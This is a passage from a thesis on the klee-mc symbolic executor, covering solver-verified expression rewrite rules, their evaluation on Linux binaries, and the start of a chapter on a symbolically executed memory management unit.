CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 122
5.4.2β-reduction
Given a rule a→bwhich reduces expression e, aβ-reduction contracts eto theb
pattern structure. Subexpressions labeled by aon the linear scan of eserve as the
variable index and term for substitution in b. There may be more labels in athan
variables in b; superfluous labels are useless terms which do not affect the value of
a. On the other hand, more variables in bthan labels in aindicates an inconsistent
rule. To get the β-reduced, contracted expression, the bpattern is materialized and
itsselect s on temporary arrays are substituted by label with subexpressions from
e.
5.5 Building Rule Sets
Rules are organized by program into rule set files for offline refinement. Rule set files
are processed by kopt , an independent program which uses expression and solver
infrastructure from the interpreter. The kopt program checks rules for integrity and
builds new rules by reapplying the rule set to materializations.
There is no guarantee the optimizer code is perfect; it is important to have multiple
checks for rule integrity and correctness. Without integrity, the expression optimizer
could be directed by a faulty rule to corrupt the symbolic computation. Worse, if a
bogus rule is used to make more rules, such as by transitive closure, the error prop-
agates, poisoning the entire rule set. All integrity checks are constraint satisfaction
queries that are verified by the solver. As already discussed, rules are checked for
correctness in the building phase. Rules are checked as a complete set, to ensure
the rules are applied correctly under composition. Finally, rules may be checked at
runtime when building new expressions in case a rule failure can only be triggered by
a certain program.
Additional processing refines a rule set’s translations when building expressions.
When rules are applied in aggregate, rather than in isolation, one rule may cause
another rule’s materialization to disagree its pattern; this introduces new structures
unrecognized by the rule set. These new structures are recognized by creating new
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 123
rules to transitively close the rule set. Further, to-patterns are normalized to improve
rule set matching by canonicalizing production templates.
5.5.1 Integrity
Rules are only applied to a program after the solver verifies they are correct. Output
from the learning phase is marked as pending and is verified by the solver indepen-
dently. Rules are further refined past the pending stage into new rules which are
checked as well. At program runtime the rule set translations can be cross-checked
against the baseline builder for testing composition.
Rule sets are processed for correctness. kopt loads a rule set and materializes each
rule into an equivalence query. The external theorem prover verifies the equivalence
is valid. Syntactic tests follow; components of the rule are constructed and analyzed.
If the rule does not reduce its from-pattern when materialized through the optimizer,
the rule is ineffective and thrown away.
A rule must be contracting to make forward progress. When expressions making
up a rule are heavily processed, such as serialization to and from SMT or rebuilding
with several rule sets, the to-expression may eventually have more nodes than the
from-expression. In this case, although the rule is valid, it is non-contracting and
therefore removed. However, the rule can be recovered by swapping the patterns and
checking validity, which is similar to the Knuth-Bendix algorithm [78].
As an end-to-end check, rule integrity is optionally verified at runtime for a pro-
gram under the symbolic interpreter. The rule-directed expression builder is cross-
checked against the default expression builder. Whenever a new expression is created
from an operator◦and arguments  ̄ x, the expression (◦ ̄x) is built under both builders
foreande′respectively. If (= e e′) is not valid according to the solver, then one
builder is wrong and the symbolic state is terminated with an error and expression
debugging information. Cross-checking also works with a fuzzer to build random
expressions which trigger broken translations. This testing proved useful when devel-
oping theβ-reduction portion of the system; in most cases it is the last resort option
since rule equivalence queries tend to catch problems at the kopt stage.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 124
5.5.2 Transitive Closure
Rules for large expressions may be masked by rules from smaller expressions. Once
rules are applied to a program’s expressions, updated rules may be necessary to
optimize the new term arrangement. Fortunately, rules are contracting, and therefore
expression size monotonically decreases; generating more rules through transitivity
converges to a minima.
An example of how bottom-up building masks rules: consider the rules r1=
[(+a b)→1] andr2= [a→c]. Expressions are built bottom-up, so ain (+a b)
reduces tocbyr2, yielding (+ cb). Ruler1no longer applies since r2eagerly rewrote
a subexpression. However, all rules are contracting, so |(+c b)|<|(+a b)|. Hence,
new rules may be generated by applying known rules, then added to the system with
the expectation of convergence to a fixed point.
A seemingly optimal solution is to embed rules within rules. For instance (+ ab)
could be rewritten as (+ D b) whereDis an equivalence class that corresponds to
bothaandc. However, aandcmay be syntactically different, and a rule can only
match one parse at a time. Embedding rules would needlessly complicate the pattern
matcher because simply adding a new rule already suffices to handle both aandc.
New rules inline new patterns as they are observed. For every instance of pattern
materialization not matching the pattern itself (as above), a new rule is created from
the new from-pattern materialization. Following the example, the rule r1must now
match (+cb), so define a new rule r3= [(+cb)→1].
The EquivDB influences the convergence rate. The database may hold inferior
translations which bubble up into learned rules. Since smaller expressions store to
the database as the rules improve, the database conveniently improves along with the
rules. Hence, a database of rule derived expressions continues to have good reductions
even after discarding the initial rule set.
5.5.3 Normal Form Canonicalization
Expressions of same size may take different forms. Consider, (= 0 a) and (= 0 b)
wherea=a1...anandb=an...a 1. Both are equivalent and have the same number
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 125
of nodes but will not be reducible under the same rule because of syntactic mismatch.
Instead, a normal form condition is imposed by selecting for the minimum of the
expression ordering operator ≤on semantic partitions on to-patterns. With normal
forms, fewer rules are necessary because semantically equivalent to-patterns must
materialize to one minimal syntactic representation.
The to-pattern materializations are collected from the rule set and partitioned
by sample hashes. Each partition Pof to-expressions is further divided by semantic
equivalence by choosing the minimum expression e⊥∈P, querying for valid equality
over every pair ( e⊥,e) wheree∈P. If the pair is equivalent, the expression eis
added to the semantic partition P(e⊥). OnceP(e⊥) is built, a new e′
⊥is chosen from
P\P(e⊥) and the process is repeated until Pis exhausted.
Normal forms replace noncanonical rule to-patterns. After partitioning the to-
expressions, the rule set is scanned for noncanonical rules with to-expressions ewhere
there is some P(e⊥) withe∈P(e⊥) wheree⊥̸=e. Every noncanonical rule to-pattern
eis replaced with e⊥and outdated rules are removed from the rule set file.
5.6 Rule Generalizations
The class of expressions a rule matches may be extended by selectively relaxing from-
pattern terms. The process of generalization goes beyond transitive closure by in-
serting new variables into expressions. Useless subterms are relaxed with dummy
variables, which match and discard any term, by applying subtree elimination to find
terms that have no effect on expression values. Constants with a set of equisatisfiable
values are relaxed by assigning constraints to a constant label.
5.6.1 Subtree Elimination
Subtree elimination marks useless from-expression terms as dummy variables in the
from-pattern. A rule’s from-expression ehas its subexpressions post-order replaced
with dummy unconstrained variables. For each new expression e′, the solver finds for
the validity of (= e e′). Ife′is equivalent, the rule’s from-pattern is rewritten with
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 126
 10 20 30 40 50 60 70 80 90 100
 1  10  100  1000  10000% Total Rules
Rules found in Equivalence ClassCumulative Equivalence Class Rule Distribution
64-bit constants
+ 32-bit
+ 16-bit
+ 8-bit
+ 8*n-bit
Figure 5.7: Acceptance of constant widths on expression equivalence class hits
e′so that it has the dummy variable.
For example, let e= (= 0 ( or1023 ( concat (select 0x) (select 1x)))) be a
from-expression. This expression, observed in practice, tests whether a 16-bit value
bitwise conjoined with 1023 is equal to 0. Since the orterm is always non-zero, the
equality never holds, implying e↠0. A good rule should match similar expressions
with any 16-bit subterm rather than the concatenation of two 8-bit reads. Traversal
first marks the 0, or, and 1023 terms as dummy variables but the solver rejects
equivalence. The concat term, however, may take any value so it is marked as a
16-bit dummy variable v16, yielding the pattern (= 0 ( or1023 v16)), which matches
any16-bit term.
5.6.2 Constant Relaxation
A large class of expressions generalize from a single expression by perturbing the
constants. In a rule, constant slots serve as constraints on the expression. Consider
the 16-bit expression e,(and 0x8000 (or 0x7ffe (ite (x) 0 1)) . The values of
theiteif-then-else term never set the 15th bit, so e↠0. By marking 0x8000
as a labeled constant c, this reduction generalizes to the rule (and 0x8000 (or c
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 127
(ite (x) 0 1)) wherec < 0x8000 is the constant constraint , which expands the
rule’s reach from one to thousands of elements in ↠. We refer to this process of
slotting out constants with weaker constraints to match more expressions as constant
relaxation .
To find candidates for constant relaxation, rules are partitioned by from-pattern
expression materialization into constant-free equivalence classes. The constant-free
syntactic equivalence between expressions eande′is written as e≡ce′. Let the
functionαc: Expr→Exprα-substitute all constants with a fixed sequence of distinct
free variables. When the syntactic equivalence αc(e)≡αc(e′) holds, then constant-
free equivalence e≡ce′follows.
A cumulative distribution of equivalence class sizes in ≡cfrom hundreds of rules
is given in Figure 5.7. Constants in rules are α-substituted with a dummy variable
by bit-width from 64-bit only to all byte multiples. Singleton equivalence classes hold
rules that are syntactically unique and therefore likely poor candidates for constant
relaxation; there are no structurally similar rules with slightly different constants. In
contrast, rules in large classes are syntactically common modulo constants. Aside
from admitting more rules total, the distribution is insensitive to constant width past
64-bits; few rules are distinct in ≡cand one large class holds nearly a majority of
rules.
Constants are selected from a rule one at a time. The constant term tis replaced
by a unique variable c. The variable cis subjected to various constraints to find a
new rule which matches a setof constants on c. This generalizes the base rule where
the implicit constraint is (= ct).
Constant Disjunction
The simplest way to relax a constant is to constrain the constant by all values seen for
its position in a class of rules in ≡c. A constant is labeled and the constraint is defined
as the disjunction of a set of observed values for all similar rules. The resulting rule is
a union of observed rules with similar parse trees pivoted on a specific constant slot.
The disjunction is built by greedily augmenting a constant set. The first in the
set of values Sis the constant cfrom the base rule. A new constant value vis taken
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 128
from the next rule and a query is sent to the solver to check if vcan be substituted
into the base rule over c. If the validity check fails, vis discarded. If vis a valid
substitution, it is added to S. When all candidate values from the rule equivalence
class are exhausted, the constraint on the labeled constant slot cis⋁
s∈S(=cs).
Constant Ranges
Range constraints restrict a constant to a contiguous region of values. The values for
the range [a,b] on the constant substitution xare computed through binary search in
the solver. The constant cfrom the base rule is the initial pivot for the search since
c∈[a,b]. Starting from c, one binary search finds afrom [0,c] and another finds b
from [c,2n−1]. The constraint a≤x≤bis placed on the new rule and the solver
verifies equivalence to the base rule’s from-expression.
Constant Bitmasks
A constant in a rule may only depend on a few bits being set or zeroed, leaving all
other bits unconstrained. Ranges on constants only support contiguous ranges, so
it is necessary to introduce additional constraint analysis. Constant constraints on
a constant x’s bits are found by creating a mask mand valuecwhich is valid for a
predicate of the form x&m=c.
The solver is used to find the mask mbit by bit. Since the base rule is valid, the
rule’s constant value amust satisfy a&m=c. Bitkof the mask is computed by
solving for the validity of (= x(a& 2k)) whenxis constrained by the base rule.
Each set bit kimplies bit kofxmust match bit kofa.
5.7 Evaluation
The expression optimizer is evaluated in terms of performance, effects on queries, and
system characteristics on two thousand programs. Foremost, rules improve running
time and solver performance on average. Total queries are reduced on average from
baseline by the optimizer. The space overhead and expression distribution of the
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 129
Component Lines of Code
EquivDB/Learning 645
Rule Builder 1900
kopt 2519
Original Builder (Hand-written) 1315
Table 5.1: Lines of code for expression optimization
EquivDB illustrate properties of the learning phase. Rule effectiveness is measured
by number of rules used and rate of sharing.
5.7.1 Implementation
The optimizer system is written for klee-mc as a drop-in replacement for the existing
optimizing expression builder. Table 5.1 shows the lines of C++ code for major
components of the expression handling system. Qualitatively, the code for the new
optimizer represents a modest effort compared to the ad-hoc version. The largest
component is kopt , the offline rule analysis program, where the cost of complexity is
low. The rule builder, which applies the vetted rules as expressions are built inside
the interpreter, is primarily focused on the fast matching trie. The EquivDB learning
builder uses the least code since creating candidate rules is relatively simple.
5.7.2 Test System
Programs
All experiments are performed over a set of approximately 2300 programs. The pro-
grams are from the system binary directories /{usr/,}{sbin,bin}of an up-to-date
x86-64 Gentoo Linux system. Each program is breakpointed at its entry point and
snapshotted. All future accesses to the program reuse the snapshot for reproducibility
purposes; every snapshot contains the full process memory image, including linked
shared libraries, such as the C library glibc .
Programs are set to run under the symbolic interpreter for at most five minutes.
Each program is allocated five minutes on one core of an 8-core desktop chip with
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 130
16GB of memory. There is minor additional processing and book keeping; overall,
one symbolic run of the program set takes slightly more than a day.
Path Replay
Two sets of runs are taken as a basis of comparison: one with only the ad-hoc
optimizer and the other with the rule-directed optimizer as well. The same paths must
be followed to give an accurate comparison between the baseline symbolic interpreter
and the optimizer. Since paths are known a priori, persistent query caches are disabled
to avoid distorted times.
klee-mc supports two kinds of path replay: concrete tests and branch paths. A
concrete test is a solution to path constraints which replaces symbolic values with
constants to duplicate the path. A branch path is a list of branch decisions.
Each branch path is a log of taken branch indexes (e.g., true, false) for some
completed state. Branch replay reads an entry from the log for every branch decision
and directs the replaying state toward the desired path. As an optimization, if a
branch replay forks off a state with a branch log which is a prefix for another branch
path, the branch path replay begins at the forked state.
Branch path equivalence is not guaranteed between equivalent paths using differ-
ent rule. Mismatched branch paths arise between distinct rule sets when the inter-
preter syntactically checks for constant expressions to avoid extra work; a decision is
elided on a constant for one rule set, but recorded for a non-constant on another set,
so the logs are no longer synchronized. A concrete test, on the other hand, is a value
assignment, and therefore insensitive to expression structure. Concrete tests preserve
paths across rule sets so they are used to rebuild branch paths.
5.7.3 Performance
The effect of rules on running time and solver time is given sorted in Figure 5.9.
Overall, there are significant performance gains made on average with the rule directed
optimizer. Additionally, the correlation between run and solver time is evident by
solver improvements closely following run time gains.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 131
 0 10 20 30 40 50 60 70 80 90 100 110 120 130 140 150
 0  500  1000  1500  2000% Queries Dispatched
Sorted ProgramEffect of Expression Rules on Solver Queries
Rule Queries / Base Queries
Baseline
Figure 5.8: Percentage of queries submitted using rule sets over baseline
 0 10 20 30 40 50 60 70 80 90 100 110 120 130 140 150
 0  500  1000  1500  2000% Time Used
Sorted ProgramEffect of Rules on Running Time
Rule / Base Wall Time
Rule / Base Solver Time
Baseline
Figure 5.9: Percent time for expression optimization over baseline
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 132
On average, the optimizer improves performance of the symbolic interpreter on
a wide variety of programs. The optimizer improved times by producing shorter
expressions and syntactic structures favorable to solver optimizations. The fastest
50th percentile decreases running time by at least 10%. Limited to the fastest 25th
percentile, programs see decreased running time of at least 27%.
A few programs do not benefit from the optimizer. Either no improvement or a
performance loss were observed in slightly fewer than 13% of all programs. Only five
programs (0.2%) took more than 2 ×of baseline execution time. There is no require-
ment, however, to run the optimizer, so applications which exhibit a performance
penalty with rules can simply go without and retain baseline speed.
Ultimately, less time is spent in the solver. A 94% majority of the programs spent
less time in the solver by using the optimizer. A sizeable 36% of all programs are
at least twice as fast in the solver. The 6% minority of programs, like for running
time, incurred additional solver overhead. Solver time improvement and running time
improvement appear related; only 5% of faster programs had running time decrease
more than solver time.
The percent change in queries submitted to the solver is shown ordered in Fig-
ure 5.8. On average, the total number of solver queries dispatched for consideration
is lower with the optimizer than without. Within the best 50th percentile, at least
17% of queries submitted to the solver were eliminated. In total, fewer queries were
dispatched for 87% of the programs. The query histogram in Figure 5.10 illustrates
a shift toward faster queries from slower queries.
5.7.4 EquivDB
The EquivDB reduct distribution is given in Figure 5.11. Data for the EquivDB was
collected from a single run of all programs with a five minute learning period. On the
file system, the EquivDB uses approximately 4GB of storage and contains 1.2 million
expressions, a modest overhead. Ridges appear at 8 bit multiples, indicating expres-
sions are often byte aligned; possibly because symbolic arrays have byte granularity
and most machine instructions are byte-oriented. Some ridges appear to extend past
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 133
0e+01e+52e+53e+54e+55e+56e+57e+58e+5 1e-06 1e-05 0.0001 0.001 0.01 0.1 1 100.0e+05.0e+31.0e+41.5e+42.0e+42.5e+4# Queries
Total Time (s)
Time Per QueryBase Query Latency Distribution
Queries Query Times
0e+01e+52e+53e+54e+55e+56e+57e+5 1e-06 1e-05 0.0001 0.001 0.01 0.1 1 100.0e+02.0e+34.0e+36.0e+38.0e+31.0e+41.2e+41.4e+41.6e+4# Queries
Total Time (s)
Time Per QueryRule Query Latency Distribution
Queries Query Times
Figure 5.10: Query time distribution for baseline and rule test cases
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 134
 1 8 16 24 32 40 48 56 64
 0 10 20 30 40 50 6010k20kExpressions in EquivDB
Bit WidthNodes
Figure 5.11: Distribution of expressions by node count and bitwidth in EquivDB
the node limit, suggesting the cut-off could be raised. Blank areas, such as those
between 32 and 40 bits indicate no entries. As an outlier, there are 63485 expressions
with seven nodes at 64 bits.
5.7.5 Rules
A large number of rules suggests the possibility of poor rule efficiency. Highly efficient
rules are frequently used whereas low efficiency rules apply only a few times or never
at all. If rules are one-off translations with low efficiency, then it is unlikely a fixed rule
set will be effective in general. However, as illustrated in Figure 5.13, most programs
have fewer than a few thousand rules and fewer than a hundred generalized rules.
Rule explosion is from only a few programs interacting poorly with the optimizer.
Code sharing is common through shared libraries, so it is reasonable to expect
rules to be shared as well. Figure 5.12 counts the frequency of rules found across
programs and confirms sharing. There are 41795 shared rules out of a total of 240052
rules; 17% of rules are shared. The most common rule, with 2035 programs, is an
equality lifting rule, (= −132(concat−124x8))→(=−18x8), which appears to
stem from system call error condition handling code.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 135
 1 10 100 1000
 0  50000  100000  150000  200000Number of Programs with Rule
RuleRule Sharing Across Programs
Figure 5.12: Program rule sharing.
 1 10 100 1000 10000 100000
 0  500  1000  1500  2000Number of Rules
Sorted ProgramNumber of Rules Found Across Programs
Total Rules
Subtree-Eliminated Rules
Constant-Constrained Rules
Figure 5.13: Rules for measured programs.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 136
5.8 Related Work
Peephole optimizers using a SAT solver to find optimal short instruction sequences
on machine code are well-known [9, 93]. Expression optimization with reduction rules
shares a similar goal by seeking minimal operations. The benefit of applying opti-
mization at the expression level over the instruction level is rules can path-specialize
expressions regardless of the underlying code.
For compilers, HOP [46] automatically generated peephole rules by using a for-
mal specification of the target machine. PO [54] simulates runs of register transfers
symbolically, using primitive abstract interpretation. It speculatively translates the
combined effects back into assembly code. If successful, it replaces the original with
the shorter code segment. HOP improved PO by using skeletal hashes to memoize
the rewrite rules for a faster peephole optimizer.
STOKE [118] randomly mutates instruction sequences for high-performance code
kernels. As in this system, candidate optimizations are sampled as a quick sanity
check, then verified using an SMT solver. Like sampling with the EquivDB, the
approach is incomplete in that does not guarantee an optimal instruction sequence
will be found. However, on account of synthesis and optimization costs, the STOKE
system works best when optimizing a small set of important benchmarks rather than
optimizing a wide classes of expressions as they appear in a symbolic executor.
Prior work on symbolic execution uses rule-based term rewriting for optimizing
solver queries. F-Soft [123] applies a term writing system [40] to expressions generated
through symbolic interpretation of C sources. The term rewriting system is seeded
with a hundreds of handwritten rules from formal systems (e.g., Presburger arith-
metic, equational axiomatization), was applied to a handful of programs, and found
improved solver times. However, from the total rules observed in our system and
comparatively poor performance of hand-written rules in klee , we believe manual
rule entry alone is best suited to carefully selected workloads.
Chapter 6
Symbolically Executed Memory
Management Unit
6.1 Introduction
Generally symbolic executors explore a program by applying the target’s instructions
to a mix of symbolic and concrete data. Symbolically executed instructions manip-
ulate expressions (e.g., 5, (x+ 4), (y+z−1)) as data. These expressions require
semantics beyond a traditional concrete execution model. Notably, an executor must
process memory accesses on both symbolic and concrete pointers.
A memory access is symbolic if its address expression contains a variable. To
illustrate, Figure 6.1 demonstrates some symbolic accesses in the C language. Under
symbolic execution, the function faccesses memory data with two symbolic addresses,
s[w] ands[r], both of which can resolve to any location in the array s; symbolic values
can resolve to multiple values and therefore symbolic pointers can point to multiple
addresses. Initially, sis zeroed by line 1. Assigning 1 to the symbolic s[w] on line
5 makes all values in sdepend on wsince any element may absorb the symbolic
write. The following symbolic read on line 6, s[r], returns an expression containing
the symbolic read index rand the symbolic write index w. Continuing to build on
swith symbolic accesses creates large expressions which eventually overwhelm the
executor’s satisfiability solver.
137
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 138
1char s [ 2 5 6 ] ={0 , . . . , 0};
2char f (void ){
3 int r = sym range (0 , 2 55 );
4 int w = sym range (0 , 2 55 );
5 s [w] = 1 ;
6 return s [ r ] ;}Line New Expression
1(0, ..., 0)
5((if (= w 0) 1 0), ...,
(if (= w 255) 1 0))
6(read r
((if (= w 0) 1 0), ...,
(if (= w 255) 1 0))
Figure 6.1: Symbolic memory access example code and its intermediate expressions.
A large body of work discusses symbolic execution [28, 30, 34, 58, 59, 77, 92,
119, 131] and related memory access techniques. All symbolic executors must handle
symbolic accesses; an access policy applies constraints, optimizations, or analysis
on the memory access. Such policies are built into the executor and must contend
with complicated low-level details. We claim access policy belongs in a symbolically
executed runtime library.
This chapter presents a symMMU, a runtime memory access dispatcher for sym-
bolic execution. A symMMU reroutes accesses to a runtime library which evaluates
symbolic state in situ . Runtime libraries meet desirable criteria:
•Variety of access policies, such as which addresses are accessed and how those
accesses are structured, and analysis policies, such as heap violation checking
and execution on demand-allocated symbolic buffers.
•Simplicity of implementation. Library code is short, high-level policies are free
of low-level executor details, and core system changes are non-invasive.
•Performance equal to or better than a hard-coded symbolic executor memory
access dispatcher.
This system makes several advances over the current state of the art. At a design
level, it cleanly separates mechanism (library call-out for memory accesses) and policy
(library implementation of access resolution); the symMMU supports six well-known
symbolic access policies with few lines of code. To our knowledge the symMMU’s
profiler, which symbolically tracks address hits, and heap analysis, which finds over
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 139
a thousand heap violations, are the first applications of purely symbolically executed
shadow memory. Additionally, it is the first system to test unmodified machine
code libraries with demand allocated symbolic buffers, which we use to find func-
tional differences among several distinct libc implementations. Finally, results are
tested independently of the symMMU to confirm the symbolic execution agrees with
physical hardware; this produces thousands of high-confidence faulting test cases by
automatically pruning false positives.
The rest of this chapter is structured as follows. Section 6.2 discusses background
for memory accesses and symbolic execution. Section 6.3 describes the symMMU
memory access dispatch mechanism in the context of a symbolic executor’s state
memory subsystem. Section 6.4 continues by detailing several policies and analysis
techniques supported by the symMMU system. Section 6.5 evaluates the implementa-
tion of the dispatch and policies with benchmarks and a large set of Linux programs.
Finally, Section 6.6 concludes.
6.2 Background
This section provides background information on handling memory accesses, symbolic
execution systems, and a formal description of symbolic memory accesses.
6.2.1 Related Work
The symMMU touches a wide range of memory access translation topics. At a low
level, address translation in hardware memory management units (MMUs) and op-
erating systems (virtual memory) have software controlled, adjustable policies [3, 53,
128]. For software testing, memory access instrumentation plays an important role
in dynamic analysis [100, 101, 117, 136]. All symbolic executors handle symbolic
accesses but memory subsystems and analysis approaches differ across systems.
The usefulness of software-defined memory translation has long been acknowl-
edged. RISC architectures, such as MIPS and SPARC, provide mechanisms for soft-
ware translation lookaside buffer (TLB) handling; accesses fault into software handlers
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 140
which map virtual addresses to physical addresses. Software TLBs have a large design
space and varying performance characteristics [128]. Operating systems designers also
recognize the importance of customization with virtual memory page-faults [3, 53].
The symMMU TLB mechanism ( §6.3.2) shares a similar interface to software TLBs.
Many dynamic program analysis algorithms rely on custom memory access han-
dling. Metadata for these algorithms is often stored in shadow memory [99, 137]. This
metadata includes lock sets [117], vector clocks [136], heap allocation [100], and in-
formation flow [101]. Section 6.4.2 describes a symbolic extension of shadow memory
for partial heap checking.
The symMMU supports and extends prior work on symbolic execution. Despite
running in a symbolic environment, a natural setting for expressing symbolic poli-
cies, symbolically executed runtime code has primarily only modeled specific system
environments [86, 116], rather than core system functionality. Meanwhile, the sym-
bolic access policies ( §6.4.1) in contemporary symbolic execution systems are quite
diverse but also hard-coded. These policies include pointer concretization [58, 92],
prioritized concretization [30], symbolic indexing on objects [28, 29, 52], and variable
creation [59, 131]. Another policy tags floating-point expressions to report errors
on dereference [57]. Other systems lazily initialize or demand allocate accesses on
symbolic pointers [75, 110] ( §6.4.3). Woodpecker [44] can instrument accesses like
a symMMU but only with built-in checkers. Likewise, FIE [45]’s memory smudging
and special memory IO regions could be expressed as symMMU policies, but are built
into the executor.
6.2.2 Symbolic Execution and Memory Accesses
A dynamic symbolic executor dispatches instructions to advance symbolic program
states. Each state has an address space, data memory, and other resources. When
an instruction must dereference state memory for a load or store, the executor issues
a memory access to a software memory management unit that controls the state’s
address space.
A memory access is defined by a 5-tuple ( S,s,w,i,v ). The access tuple consists
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 141
of a stateS(including its address space and constraints), a base pointer s, the access
widthwin bytes, the access instruction i, and an optional write value v. The access
widthwand instruction iare single-valued concrete data. The write value vand
pointersare expressions which may be symbolic.
Symbolic accesses require formal attention in order to have a precise discussion.
Let a symbolic pointer sbe an element of the set of pointer-width expressions on
bit-vectors. Accessing an address space, a set of disjoint address ranges, through s
assumes the constraints of the issuing state S. Whensis a symbolic pointer, p∈s[S]
denotespis a feasible concrete value for s(i.e., (=s p) is satisfiable given Swith
p∈N). Ifpfeasibly maps into S’s address space, then p∈S. For a range of pointers
[p,p+n), the subset relation [ p,p+n)⊆Sis shorthand for the existence of a feasible
solution for the conjunction p∈S∧...∧p+n−1∈S.
Any address not mapped in a state S’s address space is a bad address for S.
Typically an access to a bad address is flagged as an error with an accompanying
concrete test case. If the test raises a memory access fault under native execution,
then the test describes a true bug. For our purposes, we ignore access permissions
(e.g., read-only) on particular regions of memory since distinct permissions can be
modeled with multiple address spaces used according to the access type i.
The executor issues solver queries to determine whether a symbolic access is in S.
An access (S,s,w,i,v ) belongs to exactly one of three categories:
•Valid . No faults; p∈s[S] =⇒[p,p+w)∈S.
•Invalid . All faults; p∈s[S] =⇒[p,p+w)̸⊆S.
•Contingent . Some faults;∃p1,p2∈s[S] where
[p1,p1+w)⊆S,[p2,p2+w)̸⊆S.
Contingent accesses tend to impose the most overhead. A complete symbolic
executor finds all permissible accesses and generates at least one test case for a bad
access. To find non-faulting accesses, a solver call is submitted for every feasible
memory object to check for pointer inclusion. Remaining feasible pointer values
imply a bad access.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 142
Figure 6.2: A memory object shared among three states, an object state shared
between two states, and an unshared object state.
6.3 A Symbolically Executed MMU
This section outlines the design and implementation of a symMMU for the klee-mc
symbolic executor. First, address space and state memory structures are given. Next,
the symMMU’s dispatch mechanism and interface are discussed.
6.3.1 Address Space Structures
The symbolic executor stores target program information as a collection of states. A
state represents the process image of a partially executed path. The state memory
organization is borrowed from klee and is a typical design.
Figure 6.2 illustrates the relationship among states, address spaces, and state data
memory. A concrete address space structure maps 64-bit memory addresses to object
pairs for each state. Object pairs consist of an object state and a memory object. An
object state is a copy-on-write structure that holds the state’s memory data values.
Every read and write accesses some object state. A memory object is an immutable
structure which tracks the concrete address and length of an object state. The address
space manages concrete addresses and lies below the symMMU; symbolic addresses
require special policies which issue solver calls.
6.3.2 Soft Handlers
The symbolic executor dispatches memory data accesses through its memory man-
agement unit (MMU) subsystem. The original klee interpreter uses a hard-coded
MMU that finds access violations, resolves concrete pointers, forks on multi-object
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 143
pointers, and issues object-wide symbolically indexed accesses. Symbolic data and
queries must be explicitly managed in the executor, however, so augmenting such
a policy is a delicate procedure. In contrast, the symMMU in klee-mc bypasses
these details by forwarding memory accesses to symbolically executed runtime soft
handlers .
SymMMU soft handlers are selected by a command line argument. The executor
loads a selected handler (written in C, compiled to LLVM intermediate representation
bitcode) from a LLVM bitcode file. A handler translates either symbolic or concrete
accesses to direct memory operations on program state; translating both symbolic and
concrete accesses with the symMMU uses at least two separate handlers. Multiple
handlers can be configurably stacked based on an input file; a handler passes control
down the stack by calling executor-controlled function pointers. Example code for a
stack of two soft handlers is discussed in Section 6.4.1.
Library Interface
The executor forwards accesses to a library-provided handler through a standardized
function interface. Forwarding directs program state to handler bitcode with an
implicit function call; the interface is listed in Table 6.1. For a handler m, the
interface functions are suffixed with mto distinguish among multiple handlers.
The handler initializes internal structures with an optional function mmu init which
runs prior to executing the target program. Accesses forward to the mmu loadw
and mmu storewfunctions based on the access width w. The handler defines
mmu cleanup to impose additional constraints on a state prior to generating its test
case. When marking memory as symbolic, the executor notifies the handler through
mmu signal . Special intrinsic functions (Table 6.2) expose executor resources to
the handler; each intrinsic makes at most one solver call to minimize time spent in
non-preemptible executor code.
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 144
Figure 6.3: The symMMU pointer handling path.
Soft Handlers Action
mmu initm Initialization.
mmu cleanupm Add final constraints to test case.
mmu load{8,16,32,64,128}m(p) Load from pointer p.
mmu store{8,16,32,64,128}m(p,v)Storevinto pointer p.
mmu signalm Signals an extent was made symbolic.
Table 6.1: Trap handler functions for a handler named mwith access bit-widths
w={8,16,32,64,128}.
Access Forwarding
Figure 6.3 shows the dispatch process for accessing memory with a symMMU. When
the executor evaluates a memory access instruction, it issues an access to the pointer
dispatcher. Whether the pointer is a concrete (i.e., numeric) constant or a symbolic
expression determines the access path; the executor forwards the state to a handler
depending on the instruction and pointer type. Symbolic addresses always forward to
a symbolically executed runtime handler. Concrete addresses, if ignored or explicitly
masked, follow a built-in fast-path.
Concrete Addresses
Some memory analysis policies, such as heap access checking, must track accesses on
concrete pointers alongside symbolic pointers. However, concrete accesses are neces-
sary to symbolically execute symMMU handler code, so care must be taken to avoid
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 145
Primitive Description
klee sym hash (s) Hash expression sto constant.
klee wide loadw(s) Load with symbolic index s.
klee wide storew(s,v)Storevto symbolic index s.
klee enable softmmu Enable concrete redirection.
klee tlb ins(p) Default accesses to object at p.
klee tlb inv(p) Drop defaulting on object at p.
Table 6.2: Runtime primitives for memory access
infinite recursion. Concrete translation through the symMMU is temporarily disabled
on concrete accesses, reverting to the default built-in concrete resolution, to limit re-
cursion. For each state, a translation enabled bit controls soft handler activation.
If the bit is set, concrete accesses forward to the runtime. The translation enabled
bit is unset upon entering the handler, forcing fast path translation for subsequent
accesses. Prior to returning, the handler re-enables symMMU translation by setting
the translation bit with the klee enable softmmu intrinsic.
Translation Lookaside Buffer
Calling handlers for every concrete access is slow. Fortunately, if most concrete
